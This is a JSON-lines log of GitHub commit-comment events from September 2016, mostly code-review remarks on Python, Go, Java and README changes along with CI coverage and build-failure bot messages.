{"id":"4596009678","type":"CommitCommentEvent","actor":{"login":"ajpuglis"},"repo":{"name":"dmmc12/public-api"},"payload":{"comment":{"id":19113016,"position":10,"line":10,"path":"get_account_numbers","commit_id":"82af1c9c2588dbb3f5ed7aeaacccce963392ac9b","created_at":"2016-09-21T12:47:45Z","updated_at":"2016-09-21T12:47:45Z","body":"I wouldn't create the scripts around input on the command line interactively. Also, you'll need handle when they just press enter and don't input anything.\r\n\r\nIf they can run python scripts, they can probably add these values via arguments to the script just as easily.\r\n\r\nYou can look into the argparse module for this passing in the args."}},"created_at":"2016-09-21T12:47:45Z"}
{"id":"4596009789","type":"CommitCommentEvent","actor":{"login":"lcdsantos"},"repo":{"name":"lcdsantos/jQuery-Selectric"},"payload":{"comment":{"id":19113017,"position":null,"line":null,"path":null,"commit_id":"c78b153cb5a46cd633a5060d6a8e91c4f6fde8ac","created_at":"2016-09-21T12:47:47Z","updated_at":"2016-09-21T12:47:47Z","body":"I totally forgot about that. Can we achieve (somewhat easily) the same functionality using jQuery's built-in methods, like `$.grep` and `$.map`?\r\n\r\nI don't wan't to drop support for IE8 just now. There's code scattered all around to make it work on IE7/8 and we would have to clean all up. I rather add this feature now before we can do that."}},"created_at":"2016-09-21T12:47:47Z"}
{"id":"4596011390","type":"CommitCommentEvent","actor":{"login":"alban"},"repo":{"name":"kinvolk/scope"},"payload":{"comment":{"id":19113019,"position":5,"line":5,"path":"examples/plugins/http-requests/README.md","commit_id":"57350ff3c5419a0cf2e4b0866f2e9edf5eeec7b8","created_at":"2016-09-21T12:48:06Z","updated_at":"2016-09-21T12:48:06Z","body":"**The** HTTP requests plugin.."}},"created_at":"2016-09-21T12:48:06Z"}
{"id":"4596013161","type":"CommitCommentEvent","actor":{"login":"codeskyblue"},"repo":{"name":"BigWavelet/go-minicap"},"payload":{"comment":{"id":19113022,"position":58,"line":58,"path":"device.go","commit_id":"f26a250f98e744092e3bfbd4effc78c0511d36df","created_at":"2016-09-21T12:48:26Z","updated_at":"2016-09-21T12:48:26Z","body":"如果输出中本身就有 GO_MINICAP_TAG: 会出问题的。 而且还有更简单的办法，给你举个例子\r\n\r\n```go\r\ns := \"hello world:120\"\r\nindex := strings.LastIndexByte(s, ':')\r\nprintln(s[index:]) // should print 120\r\n```"}},"created_at":"2016-09-21T12:48:26Z"}
{"id":"4596014942","type":"CommitCommentEvent","actor":{"login":"codeskyblue"},"repo":{"name":"BigWavelet/go-minicap"},"payload":{"comment":{"id":19113026,"position":63,"line":63,"path":"device.go","commit_id":"f26a250f98e744092e3bfbd4effc78c0511d36df","created_at":"2016-09-21T12:48:47Z","updated_at":"2016-09-21T12:48:47Z","body":"这里错误的返回值也要打出来"}},"created_at":"2016-09-21T12:48:47Z"}
{"id":"4596015815","type":"CommitCommentEvent","actor":{"login":"krnowak"},"repo":{"name":"kinvolk/scope"},"payload":{"comment":{"id":19113028,"position":4,"line":4,"path":"examples/plugins/http-requests/README.md","commit_id":"57350ff3c5419a0cf2e4b0866f2e9edf5eeec7b8","created_at":"2016-09-21T12:48:57Z","updated_at":"2016-09-21T12:48:57Z","body":"Not sure I like the sentence. Maybe something like \"The output is displayed in the UI as a graph representing the recent history, and as a number above the graph representing the last measured value.\""}},"created_at":"2016-09-21T12:48:57Z"}
{"id":"4596016482","type":"CommitCommentEvent","actor":{"login":"alepuccetti"},"repo":{"name":"kinvolk/scope"},"payload":{"comment":{"id":19113032,"position":5,"line":5,"path":"examples/plugins/http-requests/README.md","commit_id":"57350ff3c5419a0cf2e4b0866f2e9edf5eeec7b8","created_at":"2016-09-21T12:49:05Z","updated_at":"2016-09-21T12:49:05Z","body":"I copied this phrase from the original docs"}},"created_at":"2016-09-21T12:49:05Z"}
{"id":"4596016655","type":"CommitCommentEvent","actor":{"login":"alban"},"repo":{"name":"kinvolk/scope"},"payload":{"comment":{"id":19113035,"position":7,"line":7,"path":"examples/plugins/http-requests/README.md","commit_id":"57350ff3c5419a0cf2e4b0866f2e9edf5eeec7b8","created_at":"2016-09-21T12:49:07Z","updated_at":"2016-09-21T12:49:07Z","body":"s/ebpf/eBPF"}},"created_at":"2016-09-21T12:49:07Z"}
{"id":"4596017816","type":"CommitCommentEvent","actor":{"login":"linyiwangteng"},"repo":{"name":"linyiwangteng/hello-world"},"payload":{"comment":{"id":19113039,"position":null,"line":null,"path":null,"commit_id":"b3ab0baa92203fc9e3bd9b8d54e3f9e5d56251ed","created_at":"2016-09-21T12:49:20Z","updated_at":"2016-09-21T12:49:20Z","body":"两个过滤器函数：domain获取传入链接的域名；fromNow获取一段时间（例如：2天前：即为当前时间到创建的时间为2天）；"}},"created_at":"2016-09-21T12:49:20Z"}
{"id":"4596020344","type":"CommitCommentEvent","actor":{"login":"sonora"},"repo":{"name":"osmandapp/Osmand"},"payload":{"comment":{"id":19113047,"position":null,"line":null,"path":null,"commit_id":"f6301008cc551a18f04bb62af7f9a971652fa88f","created_at":"2016-09-21T12:49:51Z","updated_at":"2016-09-21T12:49:51Z","body":"Yes, I just see that omitting NDK_DEBUG=1 is the same as omitting it (for android:debuggble=\"true\"). Reverted, to use the recommended default again."}},"created_at":"2016-09-21T12:49:51Z"}
{"id":"4596022014","type":"CommitCommentEvent","actor":{"login":"pmuellr"},"repo":{"name":"nodesource/nsolid-statsd"},"payload":{"comment":{"id":19113051,"position":18,"line":20,"path":"daemon.js","commit_id":"54a9dfdc58ac4fcf1ae38b409f7eb10af7598f9c","created_at":"2016-09-21T12:50:13Z","updated_at":"2016-09-21T12:50:13Z","body":"should add a test for that condition as well"}},"created_at":"2016-09-21T12:50:13Z"}
{"id":"4596022425","type":"CommitCommentEvent","actor":{"login":"krnowak"},"repo":{"name":"kinvolk/scope"},"payload":{"comment":{"id":19113052,"position":12,"line":12,"path":"examples/plugins/http-requests/README.md","commit_id":"57350ff3c5419a0cf2e4b0866f2e9edf5eeec7b8","created_at":"2016-09-21T12:50:17Z","updated_at":"2016-09-21T12:50:17Z","body":"If the running plugin **is** picked up…"}},"created_at":"2016-09-21T12:50:17Z"}
{"id":"4596024500","type":"CommitCommentEvent","actor":{"login":"hectorcorrea"},"repo":{"name":"ualbertalib/sufia_migrate"},"payload":{"comment":{"id":19113056,"position":null,"line":null,"path":null,"commit_id":"41a95efe54358fbdbea3c15f52507b79e6a6c609","created_at":"2016-09-21T12:50:41Z","updated_at":"2016-09-21T12:50:41Z","body":"@pgwillia you might want to touch base with @cam156 on this. Carolyn should be able to give you a more recent update on what happened to this code. When I left PSU the plan was to move most of this code to Sufia itself (rather than keeping it in ScholarSphere). "}},"created_at":"2016-09-21T12:50:41Z"}
{"id":"4596024965","type":"CommitCommentEvent","actor":{"login":"bubobot"},"repo":{"name":"bubobox/parse-js"},"payload":{"comment":{"id":19113059,"position":null,"line":null,"path":null,"commit_id":"15cc8c0e11c064de4beb096f7eed3d10bc736b20","created_at":"2016-09-21T12:50:46Z","updated_at":"2016-09-21T12:50:46Z","body":"[Code coverage](https://139-47334959-gh.circle-artifacts.com/0//home/ubuntu/parse-js/coverage/lcov-report/index.html) is currently at **99.76%**"}},"created_at":"2016-09-21T12:50:46Z"}
{"id":"4596026165","type":"CommitCommentEvent","actor":{"login":"krnowak"},"repo":{"name":"kinvolk/scope"},"payload":{"comment":{"id":19113061,"position":18,"line":18,"path":"examples/plugins/http-requests/README.md","commit_id":"57350ff3c5419a0cf2e4b0866f2e9edf5eeec7b8","created_at":"2016-09-21T12:51:00Z","updated_at":"2016-09-21T12:51:00Z","body":"it **can** take a while"}},"created_at":"2016-09-21T12:51:00Z"}
{"id":"4596026747","type":"CommitCommentEvent","actor":{"login":"codeskyblue"},"repo":{"name":"BigWavelet/go-minicap"},"payload":{"comment":{"id":19113063,"position":72,"line":72,"path":"device.go","commit_id":"f26a250f98e744092e3bfbd4effc78c0511d36df","created_at":"2016-09-21T12:51:06Z","updated_at":"2016-09-21T12:51:06Z","body":"你可以直接写成 exec.Command(d.AdbPath, \"shell\", cmds...), 还有两台设备的时候不会出问题吗？"}},"created_at":"2016-09-21T12:51:06Z"}
{"id":"4596028329","type":"CommitCommentEvent","actor":{"login":"krnowak"},"repo":{"name":"kinvolk/scope"},"payload":{"comment":{"id":19113069,"position":18,"line":18,"path":"examples/plugins/http-requests/README.md","commit_id":"57350ff3c5419a0cf2e4b0866f2e9edf5eeec7b8","created_at":"2016-09-21T12:51:26Z","updated_at":"2016-09-21T12:51:26Z","body":"Probably put weavescope inside backticks, so it gets monospaced."}},"created_at":"2016-09-21T12:51:26Z"}
{"id":"4596028373","type":"CommitCommentEvent","actor":{"login":"Smudgey"},"repo":{"name":"hmrc/self-service-time-to-pay"},"payload":{"comment":{"id":19113070,"position":69,"line":113,"path":"app/uk/gov/hmrc/ssttp/services/CalculatorService.java","commit_id":"4b4c4449d816833a2bb9f0e52b697324e5aa2be2","created_at":"2016-09-21T12:51:26Z","updated_at":"2016-09-21T12:51:26Z","body":"check this - getting amount to pay when its not been set? is this set?"}},"created_at":"2016-09-21T12:51:26Z"}
{"id":"4596030140","type":"CommitCommentEvent","actor":{"login":"Iresha92"},"repo":{"name":"umayanga123/scpp_android_node"},"payload":{"comment":{"id":19113074,"position":null,"line":null,"path":null,"commit_id":"5d5f9d1356b71b7c88ff70dddbf1c025e44d639b","created_at":"2016-09-21T12:51:46Z","updated_at":"2016-09-21T12:51:46Z","body":"But I think we should re-think of it in the next iteration @umayanga123 "}},"created_at":"2016-09-21T12:51:46Z"}
{"id":"4596031395","type":"CommitCommentEvent","actor":{"login":"ajpuglis"},"repo":{"name":"dmmc12/public-api"},"payload":{"comment":{"id":19113076,"position":33,"line":33,"path":"get_account_numbers","commit_id":"82af1c9c2588dbb3f5ed7aeaacccce963392ac9b","created_at":"2016-09-21T12:52:00Z","updated_at":"2016-09-21T12:52:00Z","body":"You don't need to add: ```[0:int(length)]```"}},"created_at":"2016-09-21T12:52:00Z"}
{"id":"4596031477","type":"CommitCommentEvent","actor":{"login":"alban"},"repo":{"name":"kinvolk/scope"},"payload":{"comment":{"id":19113078,"position":28,"line":28,"path":"examples/plugins/http-requests/README.md","commit_id":"57350ff3c5419a0cf2e4b0866f2e9edf5eeec7b8","created_at":"2016-09-21T12:52:02Z","updated_at":"2016-09-21T12:52:02Z","body":"s/In another terminal/In another terminal**,**/"}},"created_at":"2016-09-21T12:52:02Z"}
{"id":"4596031557","type":"CommitCommentEvent","actor":{"login":"krnowak"},"repo":{"name":"kinvolk/scope"},"payload":{"comment":{"id":19113079,"position":27,"line":27,"path":"examples/plugins/http-requests/README.md","commit_id":"57350ff3c5419a0cf2e4b0866f2e9edf5eeec7b8","created_at":"2016-09-21T12:52:03Z","updated_at":"2016-09-21T12:52:03Z","body":"Run **the** HTTP requests plugin"}},"created_at":"2016-09-21T12:52:03Z"}
{"id":"4596031736","type":"CommitCommentEvent","actor":{"login":"Smudgey"},"repo":{"name":"hmrc/self-service-time-to-pay"},"payload":{"comment":{"id":19113080,"position":83,"line":127,"path":"app/uk/gov/hmrc/ssttp/services/CalculatorService.java","commit_id":"4b4c4449d816833a2bb9f0e52b697324e5aa2be2","created_at":"2016-09-21T12:52:05Z","updated_at":"2016-09-21T12:52:05Z","body":"same here as above"}},"created_at":"2016-09-21T12:52:05Z"}
{"id":"4596033310","type":"CommitCommentEvent","actor":{"login":"gmdimitriz"},"repo":{"name":"gmdimitriz/XCSoar"},"payload":{"comment":{"id":19113085,"position":132,"line":132,"path":"src/Device/Driver/ThermalExpress/Driver.cpp","commit_id":"e0bb16c7da83ad714ebf1aca9301235171047e93","created_at":"2016-09-21T12:52:22Z","updated_at":"2016-09-21T12:52:22Z","body":"ok i will change that but this is exactly same way the bluevario device works... "}},"created_at":"2016-09-21T12:52:22Z"}
{"id":"4596033713","type":"CommitCommentEvent","actor":{"login":"krnowak"},"repo":{"name":"kinvolk/scope"},"payload":{"comment":{"id":19113086,"position":28,"line":28,"path":"examples/plugins/http-requests/README.md","commit_id":"57350ff3c5419a0cf2e4b0866f2e9edf5eeec7b8","created_at":"2016-09-21T12:52:27Z","updated_at":"2016-09-21T12:52:27Z","body":"Capitalize http."}},"created_at":"2016-09-21T12:52:27Z"}
{"id":"4596033838","type":"CommitCommentEvent","actor":{"login":"codeskyblue"},"repo":{"name":"BigWavelet/go-minicap"},"payload":{"comment":{"id":19113087,"position":75,"line":75,"path":"device.go","commit_id":"f26a250f98e744092e3bfbd4effc78c0511d36df","created_at":"2016-09-21T12:52:28Z","updated_at":"2016-09-21T12:52:28Z","body":"有buildCommand 这个函数感觉没什么用了，因为它等价于 \r\n\r\n```\r\ncmd := buildCommand(xxx)\r\ncmd.Start()\r\n```"}},"created_at":"2016-09-21T12:52:28Z"}
{"id":"4596036272","type":"CommitCommentEvent","actor":{"login":"codeskyblue"},"repo":{"name":"BigWavelet/go-minicap"},"payload":{"comment":{"id":19113093,"position":103,"line":103,"path":"device.go","commit_id":"f26a250f98e744092e3bfbd4effc78c0511d36df","created_at":"2016-09-21T12:52:56Z","updated_at":"2016-09-21T12:52:56Z","body":"重复代码"}},"created_at":"2016-09-21T12:52:56Z"}
{"id":"4596037546","type":"CommitCommentEvent","actor":{"login":"BigWavelet"},"repo":{"name":"BigWavelet/go-minicap"},"payload":{"comment":{"id":19113096,"position":72,"line":72,"path":"device.go","commit_id":"f26a250f98e744092e3bfbd4effc78c0511d36df","created_at":"2016-09-21T12:53:12Z","updated_at":"2016-09-21T12:53:12Z","body":"这个已经改了"}},"created_at":"2016-09-21T12:53:12Z"}
{"id":"4596037775","type":"CommitCommentEvent","actor":{"login":"the-kenny"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":19113097,"position":null,"line":null,"path":null,"commit_id":"d9cdbcc34ef342c13170e8f53d4416ffdd6f057f","created_at":"2016-09-21T12:53:14Z","updated_at":"2016-09-21T12:53:14Z","body":"Damn :/ Unfortunately I don't have access to an OS X box right now - I suppose we should either a) remove `libX11` and `imlib2` on darwin or add `libXext` (and possibly others?) to `buildInputs`. "}},"created_at":"2016-09-21T12:53:14Z"}
{"id":"4596038088","type":"CommitCommentEvent","actor":{"login":"Smudgey"},"repo":{"name":"hmrc/self-service-time-to-pay"},"payload":{"comment":{"id":19113100,"position":88,"line":132,"path":"app/uk/gov/hmrc/ssttp/services/CalculatorService.java","commit_id":"4b4c4449d816833a2bb9f0e52b697324e5aa2be2","created_at":"2016-09-21T12:53:18Z","updated_at":"2016-09-21T12:53:18Z","body":"paymentDates being overwritten, should be new variable?"}},"created_at":"2016-09-21T12:53:18Z"}
{"id":"4596038950","type":"CommitCommentEvent","actor":{"login":"nirvdrum"},"repo":{"name":"jruby/jruby"},"payload":{"comment":{"id":19113102,"position":8,"line":268,"path":"truffle/src/main/java/org/jruby/truffle/core/hash/HashNodes.java","commit_id":"457ca026861f7ac716f9508b50711f45e6710660","created_at":"2016-09-21T12:53:28Z","updated_at":"2016-09-21T12:53:28Z","body":"My comment is less useful. But the spacing here is different than the other 3 if statements in the diff."}},"created_at":"2016-09-21T12:53:28Z"}
{"id":"4596039118","type":"CommitCommentEvent","actor":{"login":"codeskyblue"},"repo":{"name":"BigWavelet/go-minicap"},"payload":{"comment":{"id":19113103,"position":116,"line":116,"path":"device.go","commit_id":"f26a250f98e744092e3bfbd4effc78c0511d36df","created_at":"2016-09-21T12:53:30Z","updated_at":"2016-09-21T12:53:30Z","body":"为了防止空格问题，改成 `d.shell(\"getprop\", key)`"}},"created_at":"2016-09-21T12:53:30Z"}
{"id":"4596039374","type":"CommitCommentEvent","actor":{"login":"ajpuglis"},"repo":{"name":"dmmc12/public-api"},"payload":{"comment":{"id":19113104,"position":30,"line":30,"path":"get_account_numbers","commit_id":"82af1c9c2588dbb3f5ed7aeaacccce963392ac9b","created_at":"2016-09-21T12:53:34Z","updated_at":"2016-09-21T12:53:34Z","body":"you can either do:\r\n\r\n``` 'total length of list response = %s' % length```\r\nor\r\n```'total length of list reponse = {}'.format(length)```\r\nor\r\n```'total length of list response = {length}'.format(length=length)```\r\n\r\nbut avoid doing string + string"}},"created_at":"2016-09-21T12:53:34Z"}
{"id":"4596040637","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19113105,"position":null,"line":null,"path":null,"commit_id":"27380d12a98c14aa370bb55ff14e2405baafa051","created_at":"2016-09-21T12:53:48Z","updated_at":"2016-09-21T12:53:48Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1079](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13766&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **FAILURE**\nSummary: Tests failed: 8 (8 new), passed: 214, ignored: 3 Build time: 00:09:39\n### Failed tests\n```\norg.genivi.sota.core.transfer.DeviceUpdatesSpec.when multiple packages are pending sorted by installPos: <no details avaliable>\n\norg.genivi.sota.core.transfer.DeviceUpdatesSpec.sets install priority for one package: <no details avaliable>\n\norg.genivi.sota.core.transfer.DeviceUpdatesSpec.rest of installation queue (consecutive installPos) remains Pending upon one package failing to install: <no details avaliable>\n\norg.genivi.sota.core.DeviceUpdatesResourceSpec.GET update requests for a device returns a list of PendingUpdateResponse: <no details avaliable>\n\norg.genivi.sota.core.DeviceUpdatesResourceSpec.PUT to set install order should change the package install order: <no details avaliable>\n\norg.genivi.sota.core.DeviceUpdatesResourceSpec.GET update results for a vehicle returns a list of OperationResults: <no details avaliable>\n\norg.genivi.sota.core.DeviceUpdatesResourceSpec.GET update results for an update request returns a list of OperationResults: <no details avaliable>\n\norg.genivi.sota.core.UpdateServiceSpec.queue an update for a single device creates an update request: <no details avaliable>\n\n```\n"}},"created_at":"2016-09-21T12:53:48Z"}
{"id":"4596041625","type":"CommitCommentEvent","actor":{"login":"Smudgey"},"repo":{"name":"hmrc/self-service-time-to-pay"},"payload":{"comment":{"id":19113108,"position":98,"line":142,"path":"app/uk/gov/hmrc/ssttp/services/CalculatorService.java","commit_id":"4b4c4449d816833a2bb9f0e52b697324e5aa2be2","created_at":"2016-09-21T12:54:00Z","updated_at":"2016-09-21T12:54:00Z","body":"double check this"}},"created_at":"2016-09-21T12:54:00Z"}
{"id":"4596041844","type":"CommitCommentEvent","actor":{"login":"codeskyblue"},"repo":{"name":"BigWavelet/go-minicap"},"payload":{"comment":{"id":19113109,"position":126,"line":126,"path":"device.go","commit_id":"f26a250f98e744092e3bfbd4effc78c0511d36df","created_at":"2016-09-21T12:54:02Z","updated_at":"2016-09-21T12:54:02Z","body":"判断函数存不存在又专门的函数，去查goadb的文档"}},"created_at":"2016-09-21T12:54:02Z"}
{"id":"4596043179","type":"CommitCommentEvent","actor":{"login":"alban"},"repo":{"name":"kinvolk/scope"},"payload":{"comment":{"id":19113116,"position":39,"line":39,"path":"examples/plugins/http-requests/README.md","commit_id":"57350ff3c5419a0cf2e4b0866f2e9edf5eeec7b8","created_at":"2016-09-21T12:54:18Z","updated_at":"2016-09-21T12:54:18Z","body":"s/himslef/itself\r\ns/to it/to the report/\r\ns/the scope will merge/Scope Probe/"}},"created_at":"2016-09-21T12:54:18Z"}
{"id":"4596043458","type":"CommitCommentEvent","actor":{"login":"chandan999"},"repo":{"name":"salesagility/SuiteCRM"},"payload":{"comment":{"id":19113117,"position":null,"line":null,"path":null,"commit_id":"9bb69522ef399d0391a8f8d557531f483330c0fb","created_at":"2016-09-21T12:54:21Z","updated_at":"2016-09-21T12:54:21Z","body":"Still Labels is being display as undefined for activities of calendar dashlet in homepage dashboard."}},"created_at":"2016-09-21T12:54:21Z"}
{"id":"4596045416","type":"CommitCommentEvent","actor":{"login":"bubobot"},"repo":{"name":"bubobox/parse-js"},"payload":{"comment":{"id":19113122,"position":null,"line":null,"path":null,"commit_id":"5bace3fc47b99ac7b67fb7a1eae96f56938c0216","created_at":"2016-09-21T12:54:44Z","updated_at":"2016-09-21T12:54:44Z","body":"[Code coverage](https://140-47334959-gh.circle-artifacts.com/0//home/ubuntu/parse-js/coverage/lcov-report/index.html) is currently at **99.76%**"}},"created_at":"2016-09-21T12:54:44Z"}
{"id":"4596047379","type":"CommitCommentEvent","actor":{"login":"ajpuglis"},"repo":{"name":"dmmc12/public-api"},"payload":{"comment":{"id":19113127,"position":46,"line":46,"path":"get_account_numbers","commit_id":"82af1c9c2588dbb3f5ed7aeaacccce963392ac9b","created_at":"2016-09-21T12:55:07Z","updated_at":"2016-09-21T12:55:07Z","body":"Pandas is probably overkill, and all the scripts should probably stick to standard python libraries so the user doesn't have to install extra stuff"}},"created_at":"2016-09-21T12:55:07Z"}
{"id":"4596047478","type":"CommitCommentEvent","actor":{"login":"krnowak"},"repo":{"name":"kinvolk/scope"},"payload":{"comment":{"id":19113128,"position":29,"line":29,"path":"examples/plugins/http-requests/README.md","commit_id":"57350ff3c5419a0cf2e4b0866f2e9edf5eeec7b8","created_at":"2016-09-21T12:55:08Z","updated_at":"2016-09-21T12:55:08Z","body":"Run `bash test.sh`, …\r\nlong-term (put a dash between the words)\r\nand then it will start getting the main page until user interrupts it with Ctrl+c (I'm not sure about the capitalization of the ctrl word)."}},"created_at":"2016-09-21T12:55:08Z"}
{"id":"4596048313","type":"CommitCommentEvent","actor":{"login":"codeskyblue"},"repo":{"name":"BigWavelet/go-minicap"},"payload":{"comment":{"id":19113131,"position":159,"line":159,"path":"device.go","commit_id":"f26a250f98e744092e3bfbd4effc78c0511d36df","created_at":"2016-09-21T12:55:17Z","updated_at":"2016-09-21T12:55:17Z","body":"哪里会用到density？"}},"created_at":"2016-09-21T12:55:17Z"}
{"id":"4596049800","type":"CommitCommentEvent","actor":{"login":"gearsdigital"},"repo":{"name":"lcdsantos/jQuery-Selectric"},"payload":{"comment":{"id":19113137,"position":null,"line":null,"path":null,"commit_id":"c78b153cb5a46cd633a5060d6a8e91c4f6fde8ac","created_at":"2016-09-21T12:55:33Z","updated_at":"2016-09-21T12:55:33Z","body":"Sure, it shouldn't be big problem to refactor this to built-in jQuery methods. Let me do that (if you want).\r\n\r\nWhat are you plans to drop the support? I would be happy to help you out :)"}},"created_at":"2016-09-21T12:55:33Z"}
{"id":"4596049948","type":"CommitCommentEvent","actor":{"login":"ronaldddilley"},"repo":{"name":"USGS-EROS/espa-processing"},"payload":{"comment":{"id":19113138,"position":null,"line":null,"path":null,"commit_id":"685d4c75eebe12c2e69137aaaf8863fd6a859f20","created_at":"2016-09-21T12:55:34Z","updated_at":"2016-09-21T12:55:34Z","body":"Changes look good"}},"created_at":"2016-09-21T12:55:34Z"}
{"id":"4596050715","type":"CommitCommentEvent","actor":{"login":"bubobot"},"repo":{"name":"bubobox/parse-js"},"payload":{"comment":{"id":19113139,"position":null,"line":null,"path":null,"commit_id":"f95f9cb9e5a6cbc9854f40192dc608dbb4fad83a","created_at":"2016-09-21T12:55:44Z","updated_at":"2016-09-21T12:55:44Z","body":"[Code coverage](https://141-47334959-gh.circle-artifacts.com/0//home/ubuntu/parse-js/coverage/lcov-report/index.html) is currently at **99.78%**\nCompared to **99.76%** at [master](https://140-47334959-gh.circle-artifacts.com/0//home/ubuntu/parse-js/coverage/lcov-report/index.html)\nCoverage increased by **+0.02%**"}},"created_at":"2016-09-21T12:55:44Z"}
{"id":"4596051760","type":"CommitCommentEvent","actor":{"login":"ronaldddilley"},"repo":{"name":"USGS-EROS/espa-elevation"},"payload":{"comment":{"id":19113144,"position":null,"line":null,"path":null,"commit_id":"d7464bd40ce4d5753e325f1866be84f42acb4c5c","created_at":"2016-09-21T12:55:56Z","updated_at":"2016-09-21T12:55:56Z","body":"Changes look good"}},"created_at":"2016-09-21T12:55:56Z"}
{"id":"4596051783","type":"CommitCommentEvent","actor":{"login":"codeskyblue"},"repo":{"name":"BigWavelet/go-minicap"},"payload":{"comment":{"id":19113145,"position":170,"line":170,"path":"device.go","commit_id":"f26a250f98e744092e3bfbd4effc78c0511d36df","created_at":"2016-09-21T12:55:56Z","updated_at":"2016-09-21T12:55:56Z","body":"Orientation 就只有着两种情况吗？"}},"created_at":"2016-09-21T12:55:56Z"}
{"id":"4596053118","type":"CommitCommentEvent","actor":{"login":"bubobot"},"repo":{"name":"bubobox/parse-js"},"payload":{"comment":{"id":19113148,"position":null,"line":null,"path":null,"commit_id":"3e57ec6a507887ab3b751cdd43788e6cc42b11d9","created_at":"2016-09-21T12:56:11Z","updated_at":"2016-09-21T12:56:11Z","body":"[Code coverage](https://143-47334959-gh.circle-artifacts.com/0//home/ubuntu/parse-js/coverage/lcov-report/index.html) is currently at **100%**\nCompared to **99.76%** at [master](https://140-47334959-gh.circle-artifacts.com/0//home/ubuntu/parse-js/coverage/lcov-report/index.html)\nCoverage increased by **+0.24%**"}},"created_at":"2016-09-21T12:56:11Z"}
{"id":"4596053382","type":"CommitCommentEvent","actor":{"login":"Smudgey"},"repo":{"name":"hmrc/self-service-time-to-pay"},"payload":{"comment":{"id":19113150,"position":null,"line":null,"path":null,"commit_id":"4b4c4449d816833a2bb9f0e52b697324e5aa2be2","created_at":"2016-09-21T12:56:13Z","updated_at":"2016-09-21T12:56:13Z","body":"Please see comments"}},"created_at":"2016-09-21T12:56:13Z"}
{"id":"4596054957","type":"CommitCommentEvent","actor":{"login":"alban"},"repo":{"name":"kinvolk/scope"},"payload":{"comment":{"id":19113154,"position":59,"line":59,"path":"examples/plugins/http-requests/README.md","commit_id":"57350ff3c5419a0cf2e4b0866f2e9edf5eeec7b8","created_at":"2016-09-21T12:56:30Z","updated_at":"2016-09-21T12:56:30Z","body":"Instead of duplicating the information, you could link to that page?\r\n\r\nhttps://github.com/weaveworks/scope/tree/master/examples/plugins#reporter-interface"}},"created_at":"2016-09-21T12:56:30Z"}
{"id":"4596056863","type":"CommitCommentEvent","actor":{"login":"krnowak"},"repo":{"name":"kinvolk/scope"},"payload":{"comment":{"id":19113159,"position":34,"line":34,"path":"examples/plugins/http-requests/README.md","commit_id":"57350ff3c5419a0cf2e4b0866f2e9edf5eeec7b8","created_at":"2016-09-21T12:56:52Z","updated_at":"2016-09-21T12:56:52Z","body":"Doesn't this section duplicate (at least partially) contents of the plugins' README?"}},"created_at":"2016-09-21T12:56:52Z"}
{"id":"4596058283","type":"CommitCommentEvent","actor":{"login":"pmuellr"},"repo":{"name":"nodesource/nsolid-statsd"},"payload":{"comment":{"id":19113164,"position":16,"line":18,"path":"lib/nsolid.js","commit_id":"54a9dfdc58ac4fcf1ae38b409f7eb10af7598f9c","created_at":"2016-09-21T12:57:08Z","updated_at":"2016-09-21T12:57:08Z","body":"I don't see the equivalent of command-level filtering using the `--app` cli option, as in 1.x.  Presumably this is sent to the apiclient in some fashion, along with the relevant command."}},"created_at":"2016-09-21T12:57:08Z"}
{"id":"4596058401","type":"CommitCommentEvent","actor":{"login":"Thomasklinkenbergmusic"},"repo":{"name":"Thomasklinkenbergmusic/branch_test"},"payload":{"comment":{"id":19113165,"position":1,"line":1,"path":"leverspeeksel1.py","commit_id":"82b327e373e22309315384dec037a4ad795d52cd","created_at":"2016-09-21T12:57:09Z","updated_at":"2016-09-21T12:57:09Z","body":"IK VIND DEZE KLEUR ECHT LELIJK \r\n\r\nIK VERGEEWT DIT NIET"}},"created_at":"2016-09-21T12:57:09Z"}
{"id":"4596059669","type":"CommitCommentEvent","actor":{"login":"Noitidart"},"repo":{"name":"Jan02/amo-e10s"},"payload":{"comment":{"id":19113171,"position":1,"line":1,"path":"META-INF/manifest.mf","commit_id":"cf83bd99fe026843931b1c1fabb4f408d55f813e","created_at":"2016-09-21T12:57:24Z","updated_at":"2016-09-21T12:57:24Z","body":"Delete the META-INF folder this is auto genned on upload to AMO"}},"created_at":"2016-09-21T12:57:24Z"}
{"id":"4596060125","type":"CommitCommentEvent","actor":{"login":"krnowak"},"repo":{"name":"kinvolk/scope"},"payload":{"comment":{"id":19113172,"position":39,"line":39,"path":"examples/plugins/http-requests/README.md","commit_id":"57350ff3c5419a0cf2e4b0866f2e9edf5eeec7b8","created_at":"2016-09-21T12:57:29Z","updated_at":"2016-09-21T12:57:29Z","body":"s/himslef/itself/"}},"created_at":"2016-09-21T12:57:29Z"}
{"id":"4596060227","type":"CommitCommentEvent","actor":{"login":"codeskyblue"},"repo":{"name":"BigWavelet/go-minicap"},"payload":{"comment":{"id":19113173,"position":175,"line":175,"path":"device.go","commit_id":"f26a250f98e744092e3bfbd4effc78c0511d36df","created_at":"2016-09-21T12:57:30Z","updated_at":"2016-09-21T12:57:30Z","body":"如果不匹配，m == nil, 不用再调用 MatchString了"}},"created_at":"2016-09-21T12:57:30Z"}
{"id":"4596061265","type":"CommitCommentEvent","actor":{"login":"Noitidart"},"repo":{"name":"Jan02/amo-e10s"},"payload":{"comment":{"id":19113179,"position":3,"line":3,"path":"manifest.json","commit_id":"cf83bd99fe026843931b1c1fabb4f408d55f813e","created_at":"2016-09-21T12:57:43Z","updated_at":"2016-09-21T12:57:43Z","body":"Change this line to the what you want to name the the addon"}},"created_at":"2016-09-21T12:57:43Z"}
{"id":"4596062371","type":"CommitCommentEvent","actor":{"login":"Noitidart"},"repo":{"name":"Jan02/amo-e10s"},"payload":{"comment":{"id":19113181,"position":4,"line":4,"path":"manifest.json","commit_id":"cf83bd99fe026843931b1c1fabb4f408d55f813e","created_at":"2016-09-21T12:57:55Z","updated_at":"2016-09-21T12:57:55Z","body":"What do yo uwant version to be? Probably 1.0"}},"created_at":"2016-09-21T12:57:55Z"}
